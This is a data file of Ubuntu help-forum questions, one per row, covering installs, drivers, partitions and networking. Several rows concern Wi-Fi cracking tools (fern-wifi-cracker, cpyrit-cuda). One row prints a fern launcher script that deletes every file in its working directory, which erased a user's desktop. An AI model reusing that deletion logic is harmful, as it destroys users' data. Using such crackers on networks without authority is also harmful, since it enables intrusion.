317480	wubi install fails : could not retrieve the required installation files	i have an old machine and the only way i can install ubuntu is to use wubi , but i get an error . here is the log : http : //pastebin.com/a5yjaakv 01-11 23:09 error commonbackend : invalid md5 for iso c : \ubuntu\install\installation.iso ( 5d5d1a7da2a0659b163d4f8bd70fbe6f ! = 99594c45a0175a5570cdcc5c9cb3ed8f ) none 01-11 23:09 debug tasklist : # # # finished check_iso 01-11 23:09 debug tasklist : # # finished use_cd 01-11 23:09 debug tasklist : # # running extract_kernel ... 01-11 23:09 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files
317484	how can i have a network connection after uninstalling network manager ?	i removed dnsmasq-base with sudo apt-get remove dnsmasq-base then i tried to install sudo apt-get install dnsmasq after executing the first command network manager is disabled and i am not more connected to any network , so the second command execution failed due to network error . now i am wondering how to connect to any network , since network manager is disabled , i am not able to connect to any network .
317485	device not accepting address 36 , error -71 after installing kernel 3.10rc6	i 'm using ubuntu 13.04 gnome edition . i have a problem with my arduino duemilanove board . previously i was using kernel 3.9.2-030902-generic . after i installed kernel 3.10rc6 and i started my arduino ide , i did n't see the serial port /dev/ttyusb0 as before . that 's important as that 's what i use for uploading my code onto the board . now all i see is /dev/ttys0 . i tried plugging my board in all the usb port but none of them helped in uploading via /dev/ttys0 . i do n't know it 's actually because of kernel 3.10 but previously everything was working fine . here are links for lsusb and dmesg command output , taken after plugging the board . i did finally remove kernel 3.10 and made 3.9.2 default , but dmesg remains the same and shows some errors in the last lines . i 've tried searching google for solutions , but have n't had any luck .
317486	how can i write apps with java for ubuntu phone ?	how can i write apps with java for ubuntu phone ? i am waiting this operating system and i want to be the one of those that will write apps for this new operating system . best regards . nodar
317489	script execution at user logout ( non root user )	i am in my university labs running ubuntu 12.10 with unity and i do n't have root privilleges . i need to run a script at logout . is this possible ? note : this is probably a duplicate of this question , however the answers given are quite cryptic and no specific directions are given .
317497	how to install newest version of minitube from source	i am very very unfamilar with installing from source , and the included install instructions are very vague and i tried following the commands but do n't think all the proper info is given . here is the primary instructions given . prerequisites to compile minitube you need at least qt 4.5 , qt > = 4.6 is recommended . the following qt modules are needed : core , gui , network , xml , phonon , dbus on a debian or ubuntu system type : sudo apt-get install build-essential qt4-dev-tools libphonon-dev compiling run : $ qmake and then : $ make beware of the qt3 version of qmake ! if things go wrong try running qmake-qt4 instead . running ./build/target/minitube a word about phonon on linux to be able to actually watch videos you need a working phonon setup . please do n't contact me about this , ask for help on your distribution support channels . installing on linux run : $ sudo make install this is for packagers . end users should not install applications in this way . the bold is simply because in the notes text file it has has marks for some reason . but to me this is very vague . i have the entire contents of the source file extracted into a `` minitube '' folder in my home dir . but i have tried running these qmake commands that are mentioned every way i can think of . and in every directory i can think of that makes sense . still no use . and i 'm not sure if i have the lastest version of qt ( 4.5 or 4.6 ) installed as mentioned , not sure how to find out or how to upgrade as its not listed in my update manager . any tips would be much appreciated . side note , i have already ran the most recent version of minitube previous to this one with no issues for a long time installed with simple apt-get from ppa . so i 'm not sure what the issue is here . thank you and god bless .
317498	installing idle ( using python 3.3.2 ) in ubuntu 12.04	i am trying to install the text editor idle using python 3.3.2 in ubuntu 12.04 , but from the ubuntu software centre i have been told that there is no package called idle-python 3.3 from current software sources . does this mean that it is not possible to install for ubuntu 12.04 ? could i update those sources to include that package ( idle-python 3.3 ) for ubuntu 12.04 ?
317501	how to make a clean re-install over a same release version ?	my ubuntu 13.04 after upgrade was unstable so i decided to make a clean install . when i went to install from bootable dvd i chose the something else ... option so i was able to manually set up my partitions . i selected the / partition of 80 gb and selected partition . i left the swap unchanged of 14 gb ( i have 8 gb ram ) . when i selected the /home partition i did n't select partition because i wanted to keep my old home file system but now i have a strange organisation if i open the /home there is : myuser - > this a clean home with no files just the default folders you get at start home/myuser - > here is where all the old files are so i was wondering if i could just copy the contents of the old home folder and paste them to replace the new home . i am having doubts because in the old home there are some folders from old programs . will they create problems for the new system ? will the old programs work ? should i copy only files and not the programs ? for now the new install has none of the original settings nor programs . is there a way i could do this operation on command line and indicate that home folder is actually old home folder and delete the new home ? i followed the instructions of this link installing fresh ubuntu 13.04 instead of ubuntu 12.10 so i thought my home folder would be kept and used as is but instead i have this weird setting .
317505	why ca n't i open the `` root '' folder in xubuntu ?	after i finished installing xubuntu i tried opening the folder `` root '' which has a cross next to it ( i did n't know what was that ) i already know that root is my hard drive so i opened it and i got this : any help would be appreciated .
317519	hibernate no longer works	i 've enabled the hibernate option and have successfully used it multiple times before , but for some reason when i tried it a few minutes ago , it only locked the computer . running sudo pm-hibernate seemed to do literally nothing -- it asked for my password , then returned to the prompt immediately after i entered it . i think this has happened before , but i do n't remember what i did to fix it ( if i really did anything ) . i need to boot windows , but i 've got stuff open and really do n't want to do a full reboot . what 's going on , and how could i fix this ?
317521	kernel panic - not syncing : no init found . try passing init=option to kernel	i formatted all the partitions in my computer to a single ext4 partition and did a fresh installation of ubuntu 13.04 . i 'm getting : failed to execute /init kernel panic - not syncing : no init found . try passing init=option to kernel . even on clean reinstall the issue persist . booting from recovery mode leads to same error , so not able to reach the terminal . but able to boot from live cd . any help much appreciated .
317522	how do i know which partition my ubuntu installation is on ?	i have ubuntu 13.04 and xubuntu on my hard drive and both of them are ext file systems . how can i find out which is which ?
317533	ubuntu 12.04 touchpad menu gone	i just got a new laptop ( asus g46 ) and have had several issues with it , odd since i 've never had issue with ubuntu and i 've used it since 7.04 . anyway , my touchpad menu is gone in the mouse and touchpad menu , which is rather annoying because i 'd like to have it disable while type so my palms do n't click elsewhere , as well as re-enable scrolling since i ca n't do that anymore as well . thanks a bunch !
317535	what should i do at `` installation type '' step in the ubuntu installation ?	i have put 12.04 onto a usb drive and i am attempting to install ubuntu this way . i 'm using windows 8 ( i upgraded from windows 7 myself ) . i do n't know what to do when i get to `` installation type '' step during the ubuntu installation . i am given a box with 3 things : dev/sda dev/sda1 104mb 35mb { windows bootloader ? } dev/sda2 1000000mb unknown { this is my hard drive } under the box are the following buttons : new partition table , add , change and delete . and there is another section which says : device for bootloader sda ata seagate { this is my hard drive } sda1 windows 8 bootloader sda2 i want to dual-boot windows 8 with ubuntu without losing any of my windows partition , is this possible ?
317536	install ubuntu and upgrade windows	i 'm running windows 7 on my laptop . i 'm going to upgrade to windows 8 and also installing ubuntu along side . my questions : should i install ubuntu to my ssd ? ( i have windows 7 on hdd and ca n't create more partition ) i 'm planning to upgrade to windows 8 after install ubuntu , is that okay ? ( i have uefi disabled , currently on legacy boot so i guess the order does not matter ? ) i have intel smart storage tech . ( ssd cache ) should i disable it when upgrade/install ubuntu and windows 8 ?
317539	notepad++ nppftp alternative in linux	i know there are questions about notepad++ here but mine is a bit different . i am developing a website and with the nppftp plugin in notepad++ i am able to directly connect to the server that contains the site i am working on . i am able to create/edit/delete pages/content etc . is there something similiar in linux . any tool that will let me edit pages directly on the server . any help would be appreciated .
317540	ubuntu hanging almost constantly after changing nic driver	how i think it happened i recently tried to install a different driver on my network adapter because i thought that my ethernet port was causing problems - turned out it was my router and that nothing was wrong with my computer . symptoms now , my computer keeps hanging when i try to do anything , although system monitor does n't seem to register any kind of cpu usage . i 'm not 100 % sure that the network driver was the issue , but it was the last change i made . also , the `` wired network disconnected '' message keeps popping up - but only in normal mode and when the computer is hanging . another strange thing is that if i start in safe graphics mode , the computer functions normally ( most of the time ) . also , the problem seems to be getting worse . the first couple of times it started hanging , i reset the machine and it was fine after that . now i can barely get it to function normally . it is also worth mentioning that the problem seems to have something to do with startup : if the computer is n't hanging after startup , it will be fine that entire session . if i restart , and it begins hanging , it will never stop . are there any possible options for `` undoing '' whatever it was i did ? i would love to just be able to `` restore '' to a previous configuration but i do n't think that is possible . is there any way to just uninstall all unnecessary drivers , in case that is causing some sort of conflict ? information ubuntu 12.04 - 32 bit intel core i3 integrated intel graphics additional details output of lshw -class network - notice that my ethernet card is not listed *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 01 serial : 88:25:2c : ae : c1 : dc width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.2.0-48-generic-pae firmware=n/a ip=192.168.1.110 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:5000 ( size=256 ) memory : d4500000-d4503fff dmesg output my dmesg output : http : //pastebin.com/kcpjfsdt - notice at the bottom it is filled with r8101 : eth0 : link up messages .
317542	danish mac keyboard layout is n't correct	no matter which one of the 5 available danish keyboard layouts i choose from , the @ symbol ( at ) is always alt2 instead of the alt ' , which is normal on danish mac keyboards . the answer to no keyboard layout in keyboard preferences to match danish macbook does n't fix this . list of danish keyboard layouts in ubuntu : danish ( macintosh ) keyboard layout in ubuntu : danish keyboard layout in mac os x ( no modifiers , shift , alt , alt+shift ) : if there is not an easy way to fix this without manually changing all the keys , could i use the following text to automate this ? 1 : $ 1234567890+´ 2 : qwertyuiopå¨ 3 : asdfghjklæø' 4 : < zxcvbnm , .- shift-1 : § ! `` # € % & / ( ) = ? ` shift-2 : qwertyuiopå^ shift-3 : asdfghjklæø* shift-4 : > zxcvbnm ; : _ alt-1 : ¡“§£∞™¶ [ ] ≠±' alt-2 : °∑é®†¥ü|œπ‘~ alt-3 : ªß∂ƒ©«‹∆¬äö @ alt-4 : ≤ω…ç√∫ñµ‚·– shift+alt-1 : '¯” $ ¢‰˜\ { } ≈¿⁄ shift+alt-2 : •˚éâ‡ÿüıœ∏’^ shift+alt-3 : êˇ˘ﬁá»›˝ﬂäöº shift+alt-4 : ≥¸˙ç◊ëñ˛„÷—
317543	kdevelop `` failed to lock session '' after crash	my machine crashed with kdevelop running , and after rebooting it wo n't start , saying : failed to lock the session , probably it is already active in another running instance however i definitely do not have it running anywhere . how can i clear up whatever kind of lock it created and failed to clean up after itself ?
317547	13.04 swap partition not found	i just installed 13.04 a few days ago . i did n't read the install screens all that carefully and apparently picked the default partition scheme . now i am trying to build the thunderbird source and i am running in to this issue : 19:43.45 /usr/bin/ld : failed to set dynamic section sizes : memory exhausted 19:43.45 collect2 : error : ld returned 1 exit status 19:43.45 make [ 5 ] : *** [ libxul.so ] error 1 19:43.45 make [ 4 ] : *** [ libs_tier_platform ] error 2 19:43.45 make [ 3 ] : *** [ tier_platform ] error 2 19:43.45 make [ 2 ] : *** [ default ] error 2 19:43.56 make [ 1 ] : *** [ default ] error 2 19:43.73 make : *** [ build ] error 2 19:44.21 923 compiler warnings present . my first thought was my swap partition is too small , i only have 2gb ram and mozilla codebase is quite large i believe . so i do a fdisk and to my surprise there is no swap partition : command ( m for help ) : p disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009a78a device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 625141759 312320001 5 extended /dev/sda5 501760 625141759 312320000 83 linux but when i do a free it shows swap , and fstab shows that a swap is mounted : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=044214de-d052-4e84-90a6-338cf5627474 /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 and /dev/mapper/ubuntu -- vg-swap_1 is symlinked to /dev/dm-1 . and mount : /dev/mapper/ubuntu -- vg-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda1 on /boot type ext2 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /home/chris/.private on /home/chris type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=99409939c385d92d , ecryptfs_fnek_sig=037f9b93ee4e906e ) gvfsd-fuse on /run/user/chris/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=chris ) what is going on ? do i have swap space ?
317552	installer says no operative system found	i try to install bbuntu with usb and bootloader when i come to the step partition . there do n't pop up any partition in that menu . only that error pops up . the computer i try to install ubuntu on is a asus eee pc p1001 . and this mini pc has been caused by american megatrends boot up . there is no os on it .
317554	where is update manager in xubuntu 13.04 ?	update manager does n't work in xubuntu 13.04 . when the system loads a notice appears `` there are 96 updates , click this note to update '' . i click a notice but nothing happens , it just disappears . i read their site : http : //xubuntu.org/upgrading/ open applications- > system- > update manager . but there is no any update manager in system . where to find update manager or how to enable it ?
317559	refer a working video editor	i need a simple video editor , just pasting several video files in mov format and producing mp4 . tried openshot and pitivi and they keep crashing and can not produce anything . quite pathetic .
317568	how can i put a windows7 shared folder on my ubuntu desktop ?	i 've got a network with several machines running ubuntu 12.04 and one server running windows7 . the server has many shared folders . i 've managed to connect to those folders and add them inside nautilus as bookmarks , so they mount whenever i click on them , which is fine . now i 'd like to add those same folder on the desktop , but i ca n't find a way to do it .
317571	steam - left 4 dead 2 showing twice	i recently installed steam and i see the game left 4 dead 2 appear twice , once with a beta tag and another with the same tag but between parenthesis . here 's a screen capture of what i 'm seeing : what 's the difference between these two ? a few days ago i installed the one with the beta tag in parenthesis and today i purchased the left 4 dead + left 4 dead 2 bundle ( http : //store.steampowered.com/sub/2487/ ) but so far left 4 dead 2 has n't showed up in my library . is it the same as the one i already installed ? should i wait a bit more for it to start downloading ( it 's been ~30 minutes ) ? this is really confusing .
317572	performance issues after upgrading to 13.04	i 've recently upgraded to 13.04 from 12.04 and i 've experienced some performance issues with games ( mostly ) i was n't having with 12.04 , relatively simple games like xonotic freeze my system after an hour or so and i have to force shut down the system . specs : inter i7 2.2 ghz 4gb ram geforce gt 540m i 've tried running the games with primusrun , optirun and without them , all the same result . if i try to run them in the lxde desktop i get slightly less problems , but the desktop itself is presenting a lot of bugs and programs constantly freeze .
317575	fern-wifi-cracker wo n't install	so i tried to install fern wifi cracker but it wo n't let me install it and i get this ; root @ john : ~/desktop # dpkg -i fern-wifi-cracker_1.6_all.deb selecting previously unselected package fern-wifi-cracker . ( reading database ... 251856 files and directories currently installed . ) unpacking fern-wifi-cracker ( from fern-wifi-cracker_1.6_all.deb ) ... dpkg : dependency problems prevent configuration of fern-wifi-cracker : fern-wifi-cracker depends on aircrack-ng ; however : package aircrack-ng is not installed . dpkg : error processing fern-wifi-cracker ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : fern-wifi-cracker root @ john : ~/desktop # anyone know how i can solve this problem please ? thanks !
317576	`` could not load shockwave flash '' problem on xubuntu 13.04 with chrome 28.0.1500.71	this is info from chrome : //plugins/ . it is seen that libflashplayer.so is used . system one , not chrome 's integrated one ( libpepflashplayer.so ) . adobe flash player - version : 11.2 r202 shockwave flash 11.2 r202 name : shockwave flash version : 11.2 r202 location : /usr/lib/flashplugin-installer/libflashplayer.so type : npapi disable mime types : mime type description file extensions application/x-shockwave-flash shockwave flash .swf application/futuresplash futuresplash player .spl so system flash does n't work , chrome can not load it . here 's an info about it http : //helpx.adobe.com/flash-player/kb/flash-player-google-chrome.html what do i need to do to make flash work in xubuntu 13.04 with chrome ? upd : chromium has the same problem too . some people suggest to use chromium instead chrome and it will work fine . do n't believe . it will not . upd 2 : the interesting thing is that on window the latest chrome is 27 ... and smth . and its integrated flash is 11.7 ... and smth . ubuntu 's chrome is 28 ... and flash is 11.2 . and from official package repository . and does n't work .
317581	12.04 hauppauge hdp vr lirc repeating keys	i have searched and read for months , every article i can find on this subject . all seems correct , only button presses from the remote repeat 2-4 times while controlling mythtv . i have tried repeat=0 and repeat=3 in .lircrc with no changes . it is as if .lircrc is being ignored . the hd-pvr works . shows up as : bus 002 device 006 : id 2040:4902 hauppauge hd pvr . these modules are loaded : ir_lirc_codec 12859 0 rc_core 26412 8 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , ir_nec_decoder , ir_kbd_i2c lirc_zilog 22513 2 lirc_dev 19204 2 ir_lirc_codec , lirc_zilog this all worked perfectly before upgrading to 12.04 . any ideas will be very appreciated . thanks .
317584	confused about groups and adduser	i have written a script to add chrooted sftp users . the useradd command is : sudo useradd -ng sftponly -ms /bin/false `` $ user '' did it work ? groups $ user $ user : sftponly yes it did . great ! then i take a look at /etc/group and there is no $ user in sftponly . i try logging in and out ( should n't need to - i am not $ user ) and nothing changes . ( for $ user == yoko ) : ftp : x:114 : sftponly : x:1003 : george , john , paul , ringo incron : x:115 : why am i seeing $ user in the correct group when using groups , but not in /etc/group ?
317589	transfering files from windows 7 to ubuntu via partition	is it possible to transfer files between ubuntu and windows by creating a partition ? like a flash drive would work ( mounting the partition , copying the files to it , then mounting and copying on the other os ) , but inside my hard drive . i know i could n't transfer folders because ubuntu uses fat32 and windows uses nfts , but what about normal files ? and what file type should i use to format the partition ? i 'm running ubuntu 12.04 , and dual-boot with wubi , if that makes a difference .
317594	how do i get my stuff back ?	okay so like 10 minutes ago i put this .py file on my desktop , chmod it to make it executable and when i double clicked it it openned up and all my files on my desktop were gone and it made a folder called `` key-database '' . does anyone know how to get my stuff back ? thanks # ! /usr/bin/env python import os import sys import time import shutil import commands from pyqt4 import qtgui , qtcore def initialize ( ) : 'set working directory' if 'core ' in os.listdir ( os.getcwd ( ) ) : create_directory ( ) else : variable = sys.argv [ 0 ] direc = variable.replace ( 'execute.py ' , '' '' ) if direc : os.chdir ( direc ) create_directory ( ) def restore_files ( ) : ' '' fern 1.2 update algorithm fails to update the new version files therefore this piece of code corrects that defect when running the program after an update from 1.2 '' ' update_directory = '/tmp/fern-wifi-cracker/' for old_file in os.listdir ( os.getcwd ( ) ) : if os.path.isfile ( os.getcwd ( ) + os.sep + old_file ) and old_file ! = '.font_settings.dat ' : os.remove ( os.getcwd ( ) + os.sep + old_file ) # delete all old directories except the `` key-database '' directory for old_directory in os.listdir ( os.getcwd ( ) ) : if os.path.isdir ( os.getcwd ( ) + os.sep + old_directory ) and old_directory ! = 'key-database ' : shutil.rmtree ( os.getcwd ( ) + os.sep + old_directory ) for update_file in os.listdir ( '/tmp/fern-wifi-cracker ' ) : # copy new update files to working directory if os.path.isfile ( update_directory + update_file ) : shutil.copyfile ( update_directory + update_file , os.getcwd ( ) + os.sep + update_file ) else : shutil.copytree ( update_directory + update_file , os.getcwd ( ) + os.sep + update_file ) def create_directory ( ) : 'create directories and database' if not os.path.exists ( 'fern-settings ' ) : os.mkdir ( 'fern-settings ' ) # create permanent settings directory if not os.path.exists ( 'key-database ' ) : # create database directory if it does not exist os.mkdir ( 'key-database ' ) def cleanup ( ) : 'kill all running processes' commands.getstatusoutput ( 'killall airodump-ng ' ) commands.getstatusoutput ( 'killall aircrack-ng ' ) commands.getstatusoutput ( 'killall airmon-ng ' ) commands.getstatusoutput ( 'killall aireplay-ng ' ) initialize ( ) if 'core ' not in os.listdir ( os.getcwd ( ) ) : restore_files ( ) from core import * functions.database_create ( ) from gui import * if __name__ == '__main__ ' : app = qtgui.qapplication ( sys.argv ) run = fern.mainwindow ( ) pixmap = qtgui.qpixmap ( `` % s/resources/screen_splash.png '' % ( os.getcwd ( ) ) ) screen_splash = qtgui.qsplashscreen ( pixmap , qtcore.qt.windowstaysontophint ) screen_splash.setmask ( pixmap.mask ( ) ) screen_splash.show ( ) app.processevents ( ) time.sleep ( 3 ) screen_splash.finish ( run ) run.show ( ) app.exec_ ( ) cleanup ( ) sys.exit ( )
317606	cpyrit-cuda build install problem	i 'm getting an error when i try to build cpyrit-cuda on ubuntu 12.04 lts here is what i 'm getting : brandon @ san-fran-la-49 : ~/cpyrit-cuda-0.4.0 $ sudo python setup.py build running build running build_ext skipping rebuild of nvidia cuda kernel ... building modules ... building 'cpyrit._cpyrit_cuda ' extension gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/local/cuda/include -i/usr/include/python2.7 -c _cpyrit_cuda.c -o build/temp.linux-x86_64-2.7/_cpyrit_cuda.o -wall -fno-strict-aliasing -dversion= '' 0.4.0 '' gcc -pthread -shared -wl , -o1 -wl , -bsymbolic-functions -wl , -bsymbolic-functions -wl , -z , relro build/temp.linux-x86_64-2.7/_cpyrit_cuda.o -lcrypto -lcuda -lz -o build/lib.linux-x86_64-2.7/cpyrit/_cpyrit_cuda.so /usr/bin/ld : can not find -lcuda collect2 : ld returned 1 exit status error : command 'gcc ' failed with exit status 1 all help is greatly appreciated , thanks !
317611	how do you find the ubuntu software center in the file system	i 'm trying to download a apt file of adobe flash plater for other browsers but i ca n't seem to find the software center . there is no application already checked off for downloading it . does anyone know where it is ?
317613	remap ctrl+c/ctrl+v to super+c/super+v	it sounds like it should be a trivial task to do , but nope.. it 's easy to find very different answers to this question , that involve lengthy configuration change and get nothing . is there a simple solution ? i use unity do not want to remap super key to ctrl-key : (
317616	i can not get to install ubuntu	every time i try to install ubuntu i get errors . i get the same error : invalid argument the versions which i 've tried so far are : 11.04 12.04 13.04 i do n't have cd 's so i have mounted the images with daemon tools ultra and i get the same errors . i get the error after i 've inputted the password and username , options for hdd , etc .
317617	how do you open apt links in ubuntu ?	i 'm trying to download an apt file but i do n't know how to . i 'm using firefox too .
317618	script to extract/push a list of wireless configurations including passwords ?	i need to configure a set of new machines . they all need a set of common wlan connections i currently have on my machine . i know how to manually retrieve the settings including the passwords using the network-manager gui . what i 'm looking for are 2 scripts : one to extract all wireless settings ( at least ssid and security type/password ) into a text format file ( xml would be fine ) , so i can edit and polish it . the other one ( unsurprisingly ) to write them back ( on a new machine ) . any pointers are welcome ! clarification : i do n't want to snoop out passwords in the wireless world , just to ease the process of documenting and distributing what is stored on one machine already .
317619	how to undo an ssh-copy-id ?	i have a 2 node hadoop cluster . i ran this command on the master : $ ssh-copy-id -i /home/hadoop/.ssh/id_rsa.pub hadoop @ 192.168.1.1 how can i undo this ? i would actually like to reassign the key . 192.168.1.1 is the slave .
317621	cheese is n't working from the software centre	i 've been trying to use cheese , but the current version from the ubuntu software centre does n't seem to work at all . it just opens and then closes . i downloaded the latest stable version from the website , but i do n't have the slightest idea on how to install it .
317630	howto install package language-support-en	i can not install language-support-en . this is what i got after trying . please help : generating locales ... en_ag.utf-8 ... up-to-date en_au.utf-8 ... up-to-date en_bw.utf-8 ... up-to-date en_ca.utf-8 ... up-to-date en_dk.utf-8 ... up-to-date en_gb.utf-8 ... up-to-date en_hk.utf-8 ... up-to-date en_ie.utf-8 ... up-to-date en_in.utf-8 ... up-to-date en_ng.utf-8 ... up-to-date en_nz.utf-8 ... up-to-date en_ph.utf-8 ... up-to-date en_sg.utf-8 ... up-to-date en_us.utf-8 ... up-to-date en_za.utf-8 ... up-to-date en_zm.utf-8 ... up-to-date en_zw.utf-8 ... up-to-date generation complete . sudo dpkg-reconfigure locales generating locales ... en_ag.utf-8 ... up-to-date en_au.utf-8 ... up-to-date en_bw.utf-8 ... up-to-date en_ca.utf-8 ... up-to-date en_dk.utf-8 ... up-to-date en_gb.utf-8 ... up-to-date en_hk.utf-8 ... up-to-date en_ie.utf-8 ... up-to-date en_in.utf-8 ... up-to-date en_ng.utf-8 ... up-to-date en_nz.utf-8 ... up-to-date en_ph.utf-8 ... up-to-date en_sg.utf-8 ... up-to-date en_us.utf-8 ... up-to-date en_za.utf-8 ... up-to-date en_zm.utf-8 ... up-to-date en_zw.utf-8 ... up-to-date generation complete . sudo apt-get install -- reinstall language-support-en reading package lists ... done building dependency tree reading state information ... done e : unable to locate package language-support-en
317636	why does the software updater say check your internet connection ? ubuntu 13.04	when i try to update the software updater says check your internet connection . ( failed to access repository information ) my internet is working just fine . i have tried many different servers . ( main , us , ext . ) also , i do not have a proxy .
317637	controlling a loop and saving the output for each event	how can i control a loop and read live feed from a usb port and save each of the output when the usb is inserted or removed . i know the code below can be improved , please assist . # ! /bin/bash time= $ ( date ) host= $ ( hostname ) if [ -n `` $ ( lsusb | grep sigma ) '' ] ; then echo `` signal connected at { $ time } hosted by : $ host '' echo `` __________________________________________________ '' else echo `` signal disconnected at { $ time } hosted by : $ host '' echo `` __________________________________________________ '' fi
317638	delay of startup applications , dropbox specifically	i have a mounting/dropbox/startup issue . i want to postpone the startup of dropbox , as my computer does not mount the disk in time , and dropbox assumes it is not there . does anyone know an easy way of delaying the startup of dropbox ? i found another answer in which you manually mount the drive , but i do not want to go that route , i simply want to adjust the time or order in which dropbox is started , maybe put it very last in the 'startup queue ' or whatever is used in this circumstance . thanks much
317645	installing ubuntu along with windows 8	sir unfortunately my copy of windows8 was not genuine and i am unable to install ubuntu 12.01 version if the formatting is the way i lost most of my data so my query is thier any possibility of installing ubuntu along with windows please reply
317648	dual booting ubuntu 12.04 and windowa 7 on different drives	i am trying to figure out how to get ubuntu and windows 7 to work in harmony . in essence i want to be able to choose which os i want to boot . the 2 os 's are currently installed on different hard drives . i have an alienware m14xr1 . the optical drive has been removed and i placed a second hard disk in its place using an adapter . i have ubuntu 12.04 running on the primary hard drive which is a 256gb ssd . on the secondary drive ( in the optical drive position on the board ) i have windows installed on a 450gb partition of a 1tb drive . the other partition is going to house my data such as music , photos , videos , movies , etc . can anyone offer me any guidance on how i can choose what drive i am booting to ? do i need to have both operating systems installed on one drive ? or can i set up something that will allow me to choose which drive i want to boot to ? would this be done in windows or ubuntu ? i looked through the bios settings to see if i could find anything . i can choose the boot priority but i ca n't choose which drive to boot to . when i go into the boot menu on the bios the again i only have the ability to choose hard drive . no option for which drive i want . any help on this matter would be greatly appreciated . thanks in advance .
317650	how do i disable the touchpad while typing on macbook ?	i have a macbook pro 5.5 and i ca n't disable the touchpad while i 'm typing . i have tried downloading gsynaptics manager or something like that , but still no dice ! this is driving me up the wall , please help .
317652	ubuntu wo n't detect my operating sysytem	i want to install ubuntu 12.04 on my toshiba qosmio laptop , that is preinstalled with windows 8 . i would like to install it side-by-side with windows , not erase windows 8 . however , the installer does not detect any operating system . how can i fix this ? *note : my laptop has two hard drives , could this be the problem ? i am booting ubuntu from a dvd with ubuntu correctly written to it . i am booting it with secure boot disabled and with the bios set to csm boot , not uefi mode . the boot mode is set to boot from dvd drive , but that is n't the problem here . i am sure about all the stuff i just listed above . there is no chance it is wrong . this is not a duplicate of another question this question installing on a pre-installed windows 8 system ( uefi supported ) because none of the answers given works for me . thanks
317654	wifi connectivity problem	i downloaded ubuntu 12.04 to try it out on a usb stick . i want to install it now , but i can not get the wifi to connect . it keeps asking for password verification . i am not very knowledgeable with computers and have never tried a linux os before . i really like what i 've seen of ubuntu so far , but i ca n't use ubuntu if i ca n't get the internet to work ...
317655	ubuntu software centre force quits and computer freezes .	i recently tried to install skype on a new install of ubuntu 12.04 . now my computer freezes often and i can not open or install anything on ubuntu software center without it force closing on me . here is the error message an error occured . please run package manager from right cick menu or run apt -get in a terminal to see what is wrong . the error message was : unknown error : '' ( e : the package skype needs to be reinstalled , but i can not find the archive for it . ) '.this usually means that your installed packages have unmet dependencies i am not sure if these two symptoms are related . aside from skype , i have also tried to install a flash plugin . please help , and keep it to simple instructions as i am a beginner . thank you
317661	how to setup local wifi network in ubuntu ?	i would like to have local home network , so my pc , netbook can share files between each other . on both machines i have ubuntu ( latest versions ) . is this possible ?
317662	ddclient updates every time and logs 'nochg : no update required '	i have installed ddclient on my server and it seems to work . however , i get these warnings in my syslog : nochg : no update required ; unnecessary attempts to change to the current address are considered abusive obviously , ddclient fires the update even if the ip address check returns the same address as last time . how can i change this to have it do the update only if the address has actually changed since the last run ? here is my /etc/ddclient.conf , with some information redacted : daemon=300 syslog=yes verbose=yes protocol=dyndns2 use=web , web=dns.loopia.se/checkip/checkip.php , web-skip='current ip address : ' server=dns.loopia.se ssl=yes login= < redacted > password= ' < redacted > ' < redacted >
317669	how do we allow a certain mac address in a forward chain through iptables ?	i set the iptables rules in default . # iptables in default iptables -p input accept iptables -p output accept iptables -p forward drop how will allow a certain mac address in a forward chain ? i tried this code : iptables -a forward -m mac -- mac-source 00:00:00:00:00 : a00 -j accept but it wo n't work . when i set all iptables chain by default to accept and block a certain mac address will work . iptables -i forward 1 -m mac -- mac-source 00:00:00:00:00:00 -j drop
